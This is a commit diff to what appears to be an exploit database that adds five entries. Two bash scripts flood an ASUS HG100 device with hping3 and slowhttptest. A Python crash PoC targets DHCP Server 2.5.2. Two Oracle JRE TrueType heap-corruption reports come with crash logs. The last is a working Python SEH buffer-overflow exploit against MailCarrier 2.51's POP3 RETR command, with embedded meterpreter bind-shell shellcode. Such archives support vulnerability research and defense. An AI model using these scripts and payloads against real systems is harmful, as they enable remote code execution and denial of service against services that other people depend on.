DB: 2019-04-18

5 changes to exploits/shellcodes ASUS HG100 - Denial of Service DHCP Server 2.5.2 - Denial of Service (PoC) Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in sc_FindExtrema4 Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in GlyphIterator::setCurrGlyphID MailCarrier 2.51 - POP3 'RETR' SEH Buffer Overflow
2019-04-18 05:01:57 +00:00 · 2019-04-18 05:01:57 +00:00 · 5e1aca383e
commit 5e1aca383e
parent ab1398c24c
6 changed files with 364 additions and 0 deletions
--- a/exploits/hardware/dos/46720.sh
+++ b/exploits/hardware/dos/46720.sh
@ -0,0 +1,34 @@
+# Exploit Title:ASUS HG100 devices denial of service(DOS) via IPv4 packets/SlowHTTPDOS 
+# Date: 2019-04-14 # Exploit Author: YinT Wang; 
+# Vendor Homepage: www.asus.com 
+# Version: Hardware version: HG100 、Firmware version:  1.05.12   
+# Tested on: Currnet 1.05.12 
+# CVE : CVE-2018-11492
+
+1. Description 
+The attack at same Local-Network-area could crash the device via the Hping3 or Slowhttptest(which is not include in the CVE-2018-11492).
+
+2.Proof of Concept
+Just Execute the following script in kali which could crash the devices
+
+    1. IPv4 packet and in result of devices crash.which written in linux script.
+
+        #needed to co-operate with hping3 tool
+        #with the time period at least 220s which could cause web server of HG100 devices crash
+        #!/bin/bash
+        read -p "enter the ip of HG100 here " url
+        hping3 -V -c 10000 -S -w 64 --flood --rand-source $url
+        sleep 220
+        echo "Hping3 –V –c 10000 –S –w 64 –flood –rand-source $url time 220s"
+        exit 0
+
+    2.Slowhttp test and caused the devices crash.which written in linux script.
+
+        #needed to co-operate with slowhttptest tool
+        #with the time period 600s which could cause web server of HG100 devices crash
+        #!/bin/bash
+        read -p "enter the ip of HG100 with port here ex: http://x.x.x.x:123 " url
+        slowhttptest -H -R -c 10000 -l 600 -u $url
+        sleep 600
+        echo "slowhttptest -H -R -c 10000 -l 600 -u $url time 600s"
+        exit 0
--- a/exploits/multiple/dos/46722.txt
+++ b/exploits/multiple/dos/46722.txt
@ -0,0 +1,99 @@
+A heap corruption was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType, implemented in a proprietary t2k library. It manifests itself in the form of the following (or similar) crash:
+
+--- cut ---
+  $ bin/java -cp . DisplaySfntFont test.ttf
+  Iteration (0,0)
+  *** Error in `bin/java': munmap_chunk(): invalid pointer: 0x00007f5cf82a6490 ***
+  ======= Backtrace: =========
+  /lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7f5cfd492bcb]
+  /lib/x86_64-linux-gnu/libc.so.6(+0x76f96)[0x7f5cfd498f96]
+  jre/8u202/lib/amd64/libt2k.so(+0x5443d)[0x7f5cd563343d]
+  jre/8u202/lib/amd64/libt2k.so(+0x47b95)[0x7f5cd5626b95]
+  jre/8u202/lib/amd64/libt2k.so(Java_sun_font_T2KFontScaler_getGlyphImageNative+0xe5)[0x7f5cd560fa25]
+  [0x7f5ce83a06c7]
+  ======= Memory map: ========
+  00400000-00401000 r-xp 00000000 fe:01 20840680                           jre/8u202/bin/java
+  00600000-00601000 r--p 00000000 fe:01 20840680                           jre/8u202/bin/java
+  00601000-00602000 rw-p 00001000 fe:01 20840680                           jre/8u202/bin/java
+  02573000-02594000 rw-p 00000000 00:00 0                                  [heap]
+  3d1a00000-3fba00000 rw-p 00000000 00:00 0
+  3fba00000-670900000 ---p 00000000 00:00 0
+  670900000-685900000 rw-p 00000000 00:00 0
+  685900000-7c0000000 ---p 00000000 00:00 0
+  7c0000000-7c00c0000 rw-p 00000000 00:00 0
+  7c00c0000-800000000 ---p 00000000 00:00 0
+  [...]
+  Aborted
+--- cut ---
+
+The crash reproduces on both Windows and Linux platforms. On Linux, it can be also triggered under Valgrind (many out-of-bounds reads and writes in sc_FindExtrema4 were ommitted in the log below):
+
+--- cut ---
+  $ valgrind bin/java -cp . DisplaySfntFont test.ttf
+  [...]
+  ==211051== Invalid write of size 8
+  ==211051==    at 0x415B30EE: sc_FindExtrema4 (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x4159A402: fs_FindBitMapSize4 (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x415D3247: MakeBWBits (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x415CAE44: T2K_RenderGlyphInternal (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x415CB3CA: T2K_RenderGlyph (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x415B4A24: Java_sun_font_T2KFontScaler_getGlyphImageNative (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x7B8D6C6: ???
+  ==211051==    by 0x7B7CDCF: ???
+  ==211051==    by 0x7B7CDCF: ???
+  ==211051==    by 0x7B7CDCF: ???
+  ==211051==    by 0x7B7D2BC: ???
+  ==211051==    by 0x7B7CA8F: ???
+  ==211051==  Address 0x3f6f1d38 is 19,160 bytes inside a block of size 19,166 alloc'd
+  ==211051==    at 0x4C2BBEF: malloc (vg_replace_malloc.c:299)
+  ==211051==    by 0x415D84A4: tsi_AllocMem (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x415B2664: sc_FindExtrema4 (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x4159A402: fs_FindBitMapSize4 (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x415D3247: MakeBWBits (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x415CAE44: T2K_RenderGlyphInternal (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x415CB3CA: T2K_RenderGlyph (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x415B4A24: Java_sun_font_T2KFontScaler_getGlyphImageNative (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x7B8D6C6: ???
+  ==211051==    by 0x7B7CDCF: ???
+  ==211051==    by 0x7B7CDCF: ???
+  ==211051==    by 0x7B7CDCF: ???
+  [...]
+--- cut ---
+
+or with AFL's libdislocator under gdb:
+
+--- cut ---
+  Thread 2 "java" received signal SIGSEGV, Segmentation fault.
+  [----------------------------------registers-----------------------------------]
+  [...]
+  R11: 0x7fffb5d89e82 --> 0x0
+  [...]
+  EFLAGS: 0x10293 (CARRY parity ADJUST zero SIGN trap INTERRUPT direction overflow)
+  [-------------------------------------code-------------------------------------]
+     0x7fffb63be972 <sc_FindExtrema4+914>:        lea    r11,[r12+r9*2]
+     0x7fffb63be976 <sc_FindExtrema4+918>:        je     0x7fffb63bea30 <sc_FindExtrema4+1104>
+     0x7fffb63be97c <sc_FindExtrema4+924>:        lea    r9d,[r8-0x1]
+  => 0x7fffb63be980 <sc_FindExtrema4+928>:        add    WORD PTR [r11],0x1
+     0x7fffb63be985 <sc_FindExtrema4+933>:        test   r9d,r9d
+     0x7fffb63be988 <sc_FindExtrema4+936>:        je     0x7fffb63bea30 <sc_FindExtrema4+1104>
+     0x7fffb63be98e <sc_FindExtrema4+942>:        add    WORD PTR [r11+0x2],0x1
+     0x7fffb63be994 <sc_FindExtrema4+948>:        cmp    r8d,0x2
+  [...]
+--- cut ---
+
+On Windows, the crash also reliably reproduces with PageHeap enabled for the java.exe process:
+
+--- cut ---
+  (244c.1660): Access violation - code c0000005 (first chance)
+  First chance exceptions are reported before any exception handling.
+  This exception may be expected and handled.
+  *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Java\jre1.8.0_202\bin\server\jvm.dll - 
+  jvm+0x8598:
+  00000000`61158598 c7040801000000  mov     dword ptr [rax+rcx],1 ds:00000000`05860280=00000001
+--- cut ---
+
+In total, we have encountered crashes in the t2k!sc_FindExtrema4 function in three different locations, in two cases while adding 1 to an invalid memory location, and in one case while adding 2 to an out-of-bounds address. Attached with this report are three mutated testcases (one for each crashing code location), and a simple Java program used to reproduce the vulnerability by loading TrueType fonts specified through a command-line parameter.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46722.zip
--- a/exploits/multiple/dos/46723.txt
+++ b/exploits/multiple/dos/46723.txt
@ -0,0 +1,115 @@
+A heap corruption was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash:
+
+--- cut ---
+  $ bin/java -cp . DisplaySfntFont test.ttf
+  Iteration (0,0)
+  #
+  # A fatal error has been detected by the Java Runtime Environment:
+  #
+  #  SIGSEGV (0xb) at pc=0x00007f7285b39824, pid=234398, tid=0x00007f7286683700
+  #
+  # JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08)
+  # Java VM: Java HotSpot(TM) 64-Bit Server VM (25.202-b08 mixed mode linux-amd64 compressed oops)
+  # Problematic frame:
+  # C  [libc.so.6+0x77824]# [ timer expired, abort... ]
+  Aborted
+--- cut ---
+
+The crash reproduces on both Windows and Linux platforms. On Linux, it can be also triggered with the MALLOC_CHECK_=3 environment variable:
+
+--- cut ---
+  $ MALLOC_CHECK_=3 bin/java -cp . DisplaySfntFont test.ttf
+  Iteration (0,0)
+  *** Error in `bin/java': free(): invalid pointer: 0x0000000002876320 ***
+  ======= Backtrace: =========
+  /lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7f84185edbcb]
+  /lib/x86_64-linux-gnu/libc.so.6(+0x76f96)[0x7f84185f3f96]
+  jre/8u202/lib/amd64/libfontmanager.so(+0x1d2b2)[0x7f83ddc672b2]
+  jre/8u202/lib/amd64/libfontmanager.so(+0x27ff4)[0x7f83ddc71ff4]
+  jre/8u202/lib/amd64/libfontmanager.so(+0x866f)[0x7f83ddc5266f]
+  jre/8u202/lib/amd64/libfontmanager.so(Java_sun_font_SunLayoutEngine_nativeLayout+0x230)[0x7f83ddc78990]
+  [0x7f84076306c7]
+  ======= Memory map: ========
+  00400000-00401000 r-xp 00000000 fe:01 20840680                           jre/8u202/bin/java
+  00600000-00601000 r--p 00000000 fe:01 20840680                           jre/8u202/bin/java
+  00601000-00602000 rw-p 00001000 fe:01 20840680                           jre/8u202/bin/java
+  023ba000-028d9000 rw-p 00000000 00:00 0                                  [heap]
+  3d1a00000-3fba00000 rw-p 00000000 00:00 0
+  3fba00000-670900000 ---p 00000000 00:00 0
+  670900000-685900000 rw-p 00000000 00:00 0
+  685900000-7c0000000 ---p 00000000 00:00 0
+  7c0000000-7c00c0000 rw-p 00000000 00:00 0
+  7c00c0000-800000000 ---p 00000000 00:00 0
+  [...]
+--- cut ---
+
+... under Valgrind:
+
+--- cut ---
+  $ valgrind bin/java -cp . DisplaySfntFont test.ttf
+  [...]
+  ==245623== Invalid write of size 2
+  ==245623==    at 0x40BF2750: GlyphIterator::setCurrGlyphID(unsigned short) (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40C0C089: SingleSubstitutionFormat1Subtable::process(LEReferenceTo<SingleSubstitutionFormat1Subtable> const&, GlyphIterator*, LEErrorCode&, LEGlyphFilter const*) const (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40C0C4A4: SingleSubstitutionSubtable::process(LEReferenceTo<SingleSubstitutionSubtable> const&, GlyphIterator*, LEErrorCode&, LEGlyphFilter const*) const (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40BF47E5: GlyphSubstitutionLookupProcessor::applySubtable(LEReferenceTo<LookupSubtable> const&, unsigned short, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const [clone .part.11] (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40C01DCE: LookupProcessor::applyLookupTable(LEReferenceTo<LookupTable> const&, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40C02FBA: LookupProcessor::applySingleLookup(unsigned short, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40BEBC9C: ContextualSubstitutionBase::applySubstitutionLookups(LookupProcessor const*, LEReferenceToArrayOf<SubstitutionLookupRecord> const&, unsigned short, GlyphIterator*, LEFontInstance const*, int, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40BEE766: ChainingContextualSubstitutionFormat3Subtable::process(LETableReference const&, LookupProcessor const*, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40BEE8E3: ChainingContextualSubstitutionSubtable::process(LEReferenceTo<ChainingContextualSubstitutionSubtable> const&, LookupProcessor const*, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40BF475B: GlyphSubstitutionLookupProcessor::applySubtable(LEReferenceTo<LookupSubtable> const&, unsigned short, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const [clone .part.11] (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40C01DCE: LookupProcessor::applyLookupTable(LEReferenceTo<LookupTable> const&, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40C02EAB: LookupProcessor::process(LEGlyphStorage&, GlyphPositionAdjustments*, char, LEReferenceTo<GlyphDefinitionTableHeader> const&, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==  Address 0x3f68a55c is 4 bytes before a block of size 104 alloc'd
+  ==245623==    at 0x4C2BBEF: malloc (vg_replace_malloc.c:299)
+  ==245623==    by 0x40BFD4CF: LEGlyphStorage::allocateGlyphArray(int, char, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40BE875A: ArabicOpenTypeLayoutEngine::characterProcessing(unsigned short const*, int, int, int, char, unsigned short*&, LEGlyphStorage&, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40C0815F: OpenTypeLayoutEngine::computeGlyphs(unsigned short const*, int, int, int, char, LEGlyphStorage&, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40BFE55D: LayoutEngine::layoutChars(unsigned short const*, int, int, int, char, float, float, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so)
+  ==245623==    by 0x40C0E91F: Java_sun_font_SunLayoutEngine_nativeLayout (in jre/8u202/lib/amd64/libfontmanager.so)
+  [...]
+--- cut ---
+
+or with AFL's libdislocator under gdb:
+
+--- cut ---
+Continuing.
+  Iteration (0,0)
+  *** [AFL] bad allocator canary on free() ***
+
+  Thread 2 "java" received signal SIGABRT, Aborted.
+  [...]
+  Stopped reason: SIGABRT
+  __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51
+  51      ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
+  gdb$ where
+  #0  __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51
+  #1  0x00007ffff72313fa in __GI_abort () at abort.c:89
+  #2  0x00007ffff7bd651c in free () from libdislocator/libdislocator.so
+  #3  0x00007fffb892f2b2 in LEGlyphStorage::reset() () from jre/8u202/lib/amd64/libfontmanager.so
+  #4  0x00007fffb8939ff4 in OpenTypeLayoutEngine::~OpenTypeLayoutEngine() ()
+     from jre/8u202/lib/amd64/libfontmanager.so
+  #5  0x00007fffb891a66f in ArabicOpenTypeLayoutEngine::~ArabicOpenTypeLayoutEngine() ()
+     from jre/8u202/lib/amd64/libfontmanager.so
+  #6  0x00007fffb8940990 in Java_sun_font_SunLayoutEngine_nativeLayout ()
+     from jre/8u202/lib/amd64/libfontmanager.so
+  #7  0x00007fffe5e376c7 in ?? ()
+  #8  0x0000000000000000 in ?? ()
+--- cut ---
+
+On Windows, the crash also reliably reproduces with PageHeap enabled for the java.exe process:
+
+--- cut ---
+  (1184.4c60): Access violation - code c0000005 (first chance)
+  First chance exceptions are reported before any exception handling.
+  This exception may be expected and handled.
+  fontmanager!Java_sun_java2d_loops_DrawGlyphListLCD_DrawGlyphListLCD+0x14bf:
+  00007ffa`0d6291bf 428124810000ffff and     dword ptr [rcx+r8*4],0FFFF0000h ds:00000000`39663ffc=????????
+--- cut ---
+
+We have encountered crashes in the libfontmanager!GlyphIterator::setCurrGlyphID function while trying to write before and after a heap allocation. Attached with this report are two mutated testcases (for the buffer under- and overflow), and a simple Java program used to reproduce the vulnerability by loading TrueType fonts specified through a command-line parameter.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46723.zip
--- a/exploits/windows/dos/46721.py
+++ b/exploits/windows/dos/46721.py
@ -0,0 +1,23 @@
+#Exploit Title: DHCP Server 2.5.2 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-04-16
+#Vendor Homepage: http://www.dhcpserver.de/cms/
+#Software Link: http://www.dhcpserver.de/cms/wp-content/plugins/download-attachments
+#Tested Version: 2.5.2
+#Tested on: Windows 7 x32 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: DHCPSRV_2.5.2.py
+#2.- Open dhcp.txt and copy content to clipboard
+#2.- Open dhcpwiz.exe 
+#3.- Click Next
+#4.- In Network Interface cards Select "Local Area Connection" and click on Next 
+#5.- In Supported Protocols click on Next 
+#6.- In Configuring DHCP for Interface Select "DHCP Options"
+#7.- Select "Bootfile" field and Paste ClipBoard
+#8.- Crashed
+
+cod = "\x41" * 6000
+f = open('dhcp.txt', 'w')
+f.write(cod)
+f.close()
--- a/exploits/windows/remote/46719.py
+++ b/exploits/windows/remote/46719.py
@ -0,0 +1,88 @@
+#!/usr/bin/python
+# Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in "RETR" command(POP3)
+# Date: 16/04/2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: https://www.tabslab.com/
+# Version: 2.51
+# Software Link: N.A
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems (Greets to the Telspace Crew)
+# Tested on: Windows XP Prof SP3 ENG x86
+# CVE: TBC from Mitre
+# Created for the Telspace Internship 2019 - SEH Exploit
+# POC
+# 1.) Change ip, username, password and port in code
+# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
+#0x1b0d110c : pop ecx # pop ecx # ret 0x08 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll)
+#N.B For all Mail Carrier exploits, increase/decrease the initial EIP overwrite buffer if your target ip is larger/smaller in digits.
+#Crash at 6174
+import sys
+import socket
+import time
+
+#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
+shellcode = ("\x89\xe1\xdb\xcb\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x69\x6c\x78\x68\x6f\x72\x47\x70\x37\x70\x53\x30\x31\x70\x4f"
+"\x79\x58\x65\x66\x51\x49\x50\x50\x64\x4c\x4b\x50\x50\x56\x50"
+"\x4e\x6b\x56\x32\x74\x4c\x6e\x6b\x50\x52\x36\x74\x6c\x4b\x63"
+"\x42\x36\x48\x66\x6f\x58\x37\x52\x6a\x35\x76\x76\x51\x69\x6f"
+"\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x75\x52\x64\x6c\x47\x50\x69"
+"\x51\x4a\x6f\x34\x4d\x37\x71\x38\x47\x58\x62\x6c\x32\x62\x72"
+"\x70\x57\x6c\x4b\x52\x72\x42\x30\x4e\x6b\x53\x7a\x65\x6c\x6e"
+"\x6b\x30\x4c\x42\x31\x33\x48\x78\x63\x31\x58\x55\x51\x4b\x61"
+"\x66\x31\x6c\x4b\x50\x59\x37\x50\x67\x71\x38\x53\x6e\x6b\x33"
+"\x79\x65\x48\x6a\x43\x75\x6a\x62\x69\x6c\x4b\x56\x54\x6e\x6b"
+"\x37\x71\x38\x56\x55\x61\x39\x6f\x4c\x6c\x4a\x61\x78\x4f\x46"
+"\x6d\x37\x71\x49\x57\x66\x58\x69\x70\x31\x65\x6b\x46\x55\x53"
+"\x51\x6d\x69\x68\x65\x6b\x61\x6d\x51\x34\x74\x35\x6a\x44\x70"
+"\x58\x6c\x4b\x30\x58\x55\x74\x65\x51\x6b\x63\x61\x76\x6e\x6b"
+"\x76\x6c\x30\x4b\x6e\x6b\x71\x48\x47\x6c\x33\x31\x7a\x73\x4c"
+"\x4b\x55\x54\x6c\x4b\x77\x71\x6e\x30\x4b\x39\x32\x64\x34\x64"
+"\x36\x44\x61\x4b\x51\x4b\x45\x31\x30\x59\x52\x7a\x42\x71\x59"
+"\x6f\x69\x70\x53\x6f\x33\x6f\x72\x7a\x4c\x4b\x34\x52\x78\x6b"
+"\x6c\x4d\x63\x6d\x71\x78\x50\x33\x77\x42\x55\x50\x53\x30\x33"
+"\x58\x70\x77\x70\x73\x30\x32\x31\x4f\x61\x44\x42\x48\x30\x4c"
+"\x54\x37\x76\x46\x34\x47\x59\x6f\x78\x55\x78\x38\x4c\x50\x33"
+"\x31\x65\x50\x35\x50\x35\x79\x48\x44\x50\x54\x30\x50\x75\x38"
+"\x56\x49\x6f\x70\x62\x4b\x75\x50\x69\x6f\x68\x55\x73\x5a\x74"
+"\x4b\x42\x79\x62\x70\x79\x72\x59\x6d\x53\x5a\x63\x31\x52\x4a"
+"\x67\x72\x65\x38\x6b\x5a\x74\x4f\x79\x4f\x69\x70\x69\x6f\x48"
+"\x55\x5a\x37\x31\x78\x44\x42\x73\x30\x33\x31\x4d\x6b\x6e\x69"
+"\x38\x66\x70\x6a\x76\x70\x70\x56\x72\x77\x53\x58\x6f\x32\x59"
+"\x4b\x46\x57\x73\x57\x39\x6f\x38\x55\x6d\x55\x39\x50\x43\x45"
+"\x61\x48\x53\x67\x65\x38\x4e\x57\x59\x79\x66\x58\x4b\x4f\x6b"
+"\x4f\x59\x45\x43\x67\x75\x38\x51\x64\x58\x6c\x77\x4b\x39\x71"
+"\x69\x6f\x49\x45\x32\x77\x4d\x47\x42\x48\x43\x45\x32\x4e\x52"
+"\x6d\x50\x61\x4b\x4f\x39\x45\x52\x4a\x67\x70\x53\x5a\x74\x44"
+"\x73\x66\x42\x77\x53\x58\x43\x32\x7a\x79\x39\x58\x63\x6f\x79"
+"\x6f\x6e\x35\x4d\x53\x4c\x38\x65\x50\x73\x4e\x46\x4d\x4e\x6b"
+"\x66\x56\x30\x6a\x57\x30\x65\x38\x33\x30\x62\x30\x77\x70\x75"
+"\x50\x63\x66\x70\x6a\x65\x50\x52\x48\x61\x48\x39\x34\x61\x43"
+"\x69\x75\x69\x6f\x38\x55\x7a\x33\x50\x53\x31\x7a\x45\x50\x66"
+"\x36\x51\x43\x76\x37\x31\x78\x43\x32\x69\x49\x6f\x38\x51\x4f"
+"\x4b\x4f\x39\x45\x4d\x53\x69\x68\x43\x30\x63\x4e\x73\x37\x67"
+"\x71\x4a\x63\x44\x69\x5a\x66\x73\x45\x38\x69\x6a\x63\x6f\x4b"
+"\x4a\x50\x4c\x75\x4e\x42\x42\x76\x33\x5a\x37\x70\x63\x63\x69"
+"\x6f\x78\x55\x41\x41")
+
+buffer = "A" * 6174 + "\xeb\x11\x90\x90" + "\x0c\x11\x0d\x1b" + "\x90" * 20 + shellcode + "D" * (10000-6882)
+
+print "[*] Mail Server 2.51 POP3 Buffer Overflow in RETR command\r\n"
+print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=s.connect(("192.168.0.150", 110))
+print s.recv(1024)
+print "[*] Sending USERNAME\r\n"
+s.send('USER test' + '\r\n')
+print s.recv(1024)
+print "[*] Sending PASSWORD\r\n"
+s.send('PASS test' + '\r\n')
+print s.recv(1024)
+s.send('RETR ' + buffer + '\r\n')
+s.send('QUIT\r\n')
+s.close()
+time.sleep(1)
+print "[*] Done, check for meterpreter shell on target ip port 443!"
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6387,6 +6387,10 @@ id,file,description,date,author,type,platform,port
 46708,exploits/windows/dos/46708.py,"PCHelpWare V2 1.0.0.5 - 'SC' Denial of Service (PoC)",2019-04-16,"Alejandra Sánchez",dos,windows,
 46709,exploits/windows/dos/46709.py,"PCHelpWare V2 1.0.0.5 - 'Group' Denial of Service (PoC)",2019-04-16,"Alejandra Sánchez",dos,windows,
 46711,exploits/windows/dos/46711.py,"AdminExpress 1.2.5 - 'Folder Path' Denial of Service (PoC)",2019-04-16,"Mücahit İsmail Aktaş",dos,windows,
+46720,exploits/hardware/dos/46720.sh,"ASUS HG100 - Denial of Service",2019-04-17,"YinT Wang",dos,hardware,
+46721,exploits/windows/dos/46721.py,"DHCP Server 2.5.2 - Denial of Service (PoC)",2019-04-17,"Victor Mondragón",dos,windows,
+46722,exploits/multiple/dos/46722.txt,"Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in sc_FindExtrema4",2019-04-17,"Google Security Research",dos,multiple,
+46723,exploits/multiple/dos/46723.txt,"Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in GlyphIterator::setCurrGlyphID",2019-04-17,"Google Security Research",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -17335,6 +17339,7 @@ id,file,description,date,author,type,platform,port
 46700,exploits/windows/remote/46700.py,"MailCarrier 2.51 - POP3 'LIST' SEH Buffer Overflow",2019-04-15,"Dino Covotsos",remote,windows,110
 46701,exploits/windows/remote/46701.py,"MailCarrier 2.51 - POP3 'TOP' SEH Buffer Overflow",2019-04-15,"Dino Covotsos",remote,windows,110
 46705,exploits/hardware/remote/46705.rb,"Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit)",2019-04-15,Metasploit,remote,hardware,
+46719,exploits/windows/remote/46719.py,"MailCarrier 2.51 - POP3 'RETR' SEH Buffer Overflow",2019-04-17,"Dino Covotsos",remote,windows,110
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,